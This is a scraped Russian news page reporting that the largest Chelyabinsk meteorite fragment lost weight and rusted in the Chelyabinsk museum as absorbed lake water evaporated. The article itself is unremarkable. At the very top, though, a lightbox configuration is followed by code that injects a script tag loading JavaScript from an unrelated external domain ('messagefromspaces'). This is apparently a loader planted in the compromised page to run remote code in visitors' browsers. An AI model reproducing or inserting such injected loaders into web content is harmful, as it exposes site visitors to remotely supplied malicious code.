, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

За время пребывания в музее осколок метеорита «похудел» и немного изменился в цвете

Самый крупный фрагмент метеорита "Челябинск" с момента подъема со дна озера Чебаркуль провел в стенах Челябинского краеведческого музея четыре месяца. За это время осколок немного изменился в цвете и усох. Внешне его размеры остались неизменными, однако уменьшился вес, а на поверхности появилась ржавчина.

Изменения, произошедшие с небесным гостем, породили множество слухов. По одному из них осколок метеорита даже подменили. Масла в огонь подлили визит в Челябинск бригады водолазов, проводивших спецоперацию по поднятию осколка. Навестив 25 декабря прошлого года поднятый фрагмент болида, водолазы отметили, что он сильно изменился.

Впрочем, у специалистов есть вполне рациональное объяснение изменениям, которые произошли с метеоритом. За время нахождения на дне озера Чебаркуль он вобрал в себя большое количество воды - от 10 до 12 литров. Постепенно эта вода испарилась и вес осколка уменьшился. Кроме того, из-за испарения воды на его поверхности образовалась ржавчина, что привело к изменению первоначального цвета. Как только из метеорита испарится вся вода, сотрудники музея проведут его реставрацию. Ржавчина будет удалена, и осколок приобретет свой естественный облик - такой, как будто то бы он упал на сушу.

 

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
23:43 - 14 февраля 2014
|
автор: U-RSS
|
(460)
|
(0)

Комментарии (0)

Я человек
Я бот